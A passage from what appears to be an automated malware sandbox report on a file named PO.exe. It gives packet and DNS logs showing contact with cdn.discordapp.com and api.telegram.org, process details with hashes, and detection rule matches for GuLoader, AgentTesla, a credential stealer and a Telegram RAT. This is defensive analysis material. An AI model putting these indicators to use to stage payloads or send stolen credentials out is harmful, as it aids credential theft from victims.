                                      Nov 29, 2022 22:48:57.137248993 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.137258053 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.137568951 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.137614012 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.137625933 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.137691021 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.137804985 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.137813091 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.137996912 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.137996912 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.138003111 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.138344049 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.144891977 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.145090103 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.145133018 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.145158052 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.145361900 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.145381927 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.145440102 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.145677090 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.145677090 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.145699978 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.145767927 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.145921946 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.146023989 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.146023989 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.146043062 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.146117926 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.146148920 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.146311998 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.146394014 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.146394968 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.146486998 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.146533966 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.146648884 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.146712065 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.146754026 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.146883011 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.146934986 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.147067070 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.147093058 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.147118092 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.147255898 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.147255898 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.147295952 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.147439003 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.147481918 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.147521973 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.147574902 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.147703886 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.147705078 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.147754908 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.147896051 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.147907972 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.147937059 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.147964001 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.148104906 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.148106098 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.148155928 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.148188114 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.148289919 CET49847443192.168.11.20162.159.133.233
                                      Nov 29, 2022 22:48:57.148339033 CET44349847162.159.133.233192.168.11.20
                                      Nov 29, 2022 22:48:57.148468971 CET49847443192.168.11.20162.159.133.233
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 29, 2022 22:48:56.855335951 CET5031353192.168.11.201.1.1.1
                                      Nov 29, 2022 22:48:56.865253925 CET53503131.1.1.1192.168.11.20
                                      Nov 29, 2022 22:50:36.482291937 CET5762053192.168.11.201.1.1.1
                                      Nov 29, 2022 22:50:36.492578030 CET53576201.1.1.1192.168.11.20
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Nov 29, 2022 22:48:56.855335951 CET192.168.11.201.1.1.10xf7f5Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                      Nov 29, 2022 22:50:36.482291937 CET192.168.11.201.1.1.10x1e1dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Nov 29, 2022 22:48:56.865253925 CET1.1.1.1192.168.11.200xf7f5No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                      Nov 29, 2022 22:48:56.865253925 CET1.1.1.1192.168.11.200xf7f5No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                      Nov 29, 2022 22:48:56.865253925 CET1.1.1.1192.168.11.200xf7f5No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                      Nov 29, 2022 22:48:56.865253925 CET1.1.1.1192.168.11.200xf7f5No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                      Nov 29, 2022 22:48:56.865253925 CET1.1.1.1192.168.11.200xf7f5No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                      Nov 29, 2022 22:50:36.492578030 CET1.1.1.1192.168.11.200x1e1dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                      • cdn.discordapp.com
                                      • api.telegram.org

                                      Click to jump to process

                                      Target ID:1
                                      Start time:22:47:26
                                      Start date:29/11/2022
                                      Path:C:\Users\user\Desktop\PO.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\PO.exe
                                      Imagebase:0x400000
                                      File size:269537 bytes
                                      MD5 hash:9297126FD9624F7DC2D4F64F072668A2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      Target ID:4
                                      Start time:22:48:35
                                      Start date:29/11/2022
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\PO.exe
                                      Imagebase:0xd30000
                                      File size:108664 bytes
                                      MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.89339190222.000000001D990000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.84958072563.0000000001110000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:high

                                      Target ID:5
                                      Start time:22:48:36
                                      Start date:29/11/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff60d240000
                                      File size:875008 bytes
                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      No disassembly